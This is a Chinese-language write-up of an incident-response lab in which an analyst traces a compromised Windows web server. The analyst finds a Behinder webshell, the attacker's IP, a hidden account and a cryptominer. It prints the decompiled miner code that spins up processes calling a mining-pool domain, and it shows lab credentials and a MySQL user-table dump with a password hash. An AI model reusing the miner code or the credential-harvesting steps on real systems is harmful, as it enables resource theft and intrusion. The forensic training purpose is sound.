应急响应靶机训练 - Web1

小李在值守的过程中,发现有 CPU 占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的 hxd 帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件:

  • 攻击者的 Shell 密码;
  • 攻击者的 IP 地址;
  • 攻击者的隐藏账户名称;
  • 攻击者挖矿程序的矿池域名;

相关账户密码:administrator/Zgsf@admin.com

1 Flag-1

由于服务器之前关过,这里需要先启动 Web 服务:

image-20251219203047491

使用浏览器访问一下:

image-20251219203139526

目前站点看不出入侵痕迹,根据要求可知,攻击者在站点下存在 WebShell。

打开 Web 根目录:

image-20251219203301477

肉眼肯定看不出来,直接去看日志(C:\phpstudy_pro\Extensions\Apache2.4.39\logs),由于日志非常大,使用 Notepad++ 打开。经过查找发现在 2024-02-26 22:46:23 时出现了 shell.php 的访问记录:

[!Warning]

这里正常说应该是看 Nginx 的,但实际是看 Apache 的。

image-20251219205508229

拼接一下 shell.php 路径:

1
C:\phpstudy_pro\WWW\content\plugins\tips\shell.php

打开文件查看内容,很明显的发现是一个冰蝎木马,没经过魔改:

image-20251219205831915

为了避免遗漏,使用 D 盾扫一扫:

image-20251219211251263

得出 Flag-1:

1
rebeyond

2 Flag-2

根据之前的日志信息可得,攻击者 IP 地址是:192.168.126.1

得出 Flag-2:

1
192.168.126.1

3 Flag-3

使用 D 盾扫描当前服务下的所有用户:

image-20251219211223109

得出 Flag-3:

1
hack168$

4 Flag-4

进入 hack168$ 用户的桌面,可以发现一个 exe 文件:

image-20251219211710797

直接丢到微步云沙箱上:

image-20251219212226367

不过看着好像没啥问题?分析出是 Python 打包的,使用 pyinstxtractor 反编译一下:

1
python pyinstxtractor.py Kuang.exe

image-20251219213346583

image-20251219213434080

反编译完成后,出现了一个 Kuang.pyc 文件,还要反编译一次:

image-20251219213637081

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

import multiprocessing
import requests

def cpu_intensive_task():
    
    try:
        requests.get('http://wakuang.zhigongshanfang.top', 10, **('timeout',))
    finally:
        continue
        continue

    continue

if __name__ == '__main__':
    cpu_count = multiprocessing.cpu_count()
    processes = (lambda .0: [ multiprocessing.Process(cpu_intensive_task, **('target',)) for _ in .0 ])(range(cpu_count))
    for process in processes:
        process.start()
    for process in processes:
        process.join()

得出 Flag-4:

1
http://wakuang.zhigongshanfang.top

5 总结攻击流程

截取部分日志内容如下:

image-20251219214225764

可以发现大量访问 /admin/account.php?action=dosignin&s= 路径的请求,尝试访问一下:

image-20251219214416743

发现是站点的登录页面,根据上述可得出以下内容:

  • 攻击者 IP:192.168.126.1

  • 攻击者访问站点时间:2024-02-26 22:28:56

  • 攻击者爆破开始时间:2024-02-26 22:34:28

  • 攻击者爆破结束时间:2024-02-26 22:37:09

登录站点 MySQL 数据查看,用户账号密码是否为弱口令:

1
2
3
4
5
6
7
mysql -uemlog123 -pemlog123
mysql> show databases;
mysql> use emlog123;
mysql> show tables;
mysql> select * from emlog_user;

# admin / $P$BZFmadazYLJBS3d.neHGpPYIc4uSrj0

image-20251220002419456

尝试撞一下:

image-20251220002730576

撞是撞出来了,但是要钱。

既然要钱,那就不登录后台了,经查询和日志比对攻击者利用的是 emlog v2.2.0 后台插件上传漏洞.